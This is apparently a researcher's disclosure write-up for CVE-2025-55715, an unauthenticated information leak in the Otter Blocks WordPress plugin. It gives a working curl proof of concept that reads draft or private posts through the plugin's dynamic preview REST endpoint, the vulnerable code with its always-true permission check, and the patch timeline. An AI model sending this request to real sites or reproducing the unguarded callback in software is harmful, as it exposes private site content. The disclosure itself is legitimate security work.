Summary
I recently discovered an unauthenticated sensitive information exposure vulnerability in the WordPress Otter Blocks plugin. It has been assigned CVE-2025-55715 and published in the patchstack database. Over 300,000 websites were affected by this vulnerability.
The plugin exposes sensitive content due to a lack of access restrictions on a dynamic content REST endpoint. This should be considered a high-risk vulnerability and updated immediately to avoid data sensitive leakage.
About The Plugin
Otter is a Gutenberg Blocks page builder plugin that adds extra functionality to the WordPress Block Editor (also known as Gutenberg) for a better page-building experience without the need for traditional page builders like Elementor and Divi.
| Plugin Name | Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE |
| Plugin Slug | otter-blocks |
| WP.org Profile | https://wordpress.org/plugins/otter-blocks |
| Active Installations | 300,000+ |
| Vulnerable Version | 3.1.0 (Download Here) |
| Patched Version | 3.1.1 (Download Here) |
| CVSS & Severity | High (7.5) |
🔧 Attack Scenario
Step 01:
Log in as an administrator. Install and activate the plugin.
Step 02:
As an Administrator:
- Create a new Post or Page.
- Set its status to Draft or Private.
- Save and note the Post ID (e.g.,
71).
Step 03:
Send the following cURL request as an un-authenticated user using the previously saved IDs with the context parameter:
curl 'http://example.com/wp-json/otter/v1/dynamic/preview?context=71&type=postExcerpt' \
--compressed \
-H 'Accept: application/json'
# Output: "This post is draft, by admin, id 71"
❗Vulnerable Code
Vulnerable File: wp-content/plugins/otter-blocks/inc/server/class-dynamic-content-server.php
register_rest_route(
$namespace,
'/dynamic/preview',
array(
array(
'methods' => \WP_REST_Server::READABLE,
'callback' => function( $request ) {
return Dynamic_Content::instance()->apply_data( $request->get_params() );
},
'permission_callback' => function () {
return true;
},
),
)
);The permission_callback returns true unconditionally meaning no user permission or authentication check is performed.
This allows anyone, even unauthenticated users, to send requests to this endpoint and extract private/draft post information.
Patch
The developers updated the permission_callback for the REST API endpoints. Now only the public posts and posts editable by the specific user can be fetched using the REST API.
This resolves the security vulnerability and ensures proper access control restrictions.
Changelog:
Here is the link to the patched file: https://plugins.trac.wordpress.org/changeset/3342854/otter-blocks/tags/3.1.1/inc/server/class-dynamic-content-server.php?old=3194429&old_path=otter-blocks%2Ftrunk%2Finc%2Fserver%2Fclass-dynamic-content-server.php
Timeline
| Report Submitted To Patchstack | 03 August, 2025 |
| Vendor Contacted | 06 August, 2025 |
| Patch Submitted | 12 August, 2025 |
| Published | 27 August, 2025 |
Conclusion
Otter Blocks (version 3.1.0 and below) exposes sensitive data such as private or draft post content to unauthenticated users via the unprotected REST API endpoint /wp-json/otter/v1/dynamic/preview/.
This endpoint is improperly guarded and allows unauthenticated attackers to retrieve post titles, excerpts, content and other metadata — even for posts that are not publicly published (i.e., drafts or private posts).
Leave a Reply